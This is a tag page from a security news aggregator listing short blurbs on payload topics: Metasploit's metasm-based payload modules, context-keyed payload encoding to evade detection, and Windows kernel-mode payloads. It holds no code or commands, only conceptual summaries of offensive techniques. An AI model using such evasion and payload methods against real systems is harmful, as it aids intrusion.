logo

payload

Category: tools | Posted by Avatar Staff 337 days ago
Via: http://blog.metasploit.com | Tags: An easier way to create payload modules in comments Discuss  
Thanks to Yoann GUILLOT and Julien TINNES, Metasploit 3.0 (the trunk version) includes integrated support for metasm, a 100% ruby assembler, disassembler, and linker. It currently supports x86 and MIPS, but support for many other architectures is in development. Using metasm, we've taken some steps to improve the framework's payload module interface. This improvement is designed to make it possible for payload modules to contain assembly rather than the typical large blob of pre-assembled machine code. read more »
addto Add this link to... report Bury 
| Posted by Avatar Staff 334 days ago
Via: http://www.uninformed.org | Tags: contextkeyed payload encoding comments Discuss  
A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, th read more »
addto Add this link to... report Bury 
| Posted by Avatar Staff 334 days ago
Via: http://uninformed.org | Tags: windows kernelmode payload fundamentals comments Discuss  
This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the ... read more »
addto Add this link to... report Bury 


Copyright 2005-2008 Best of Security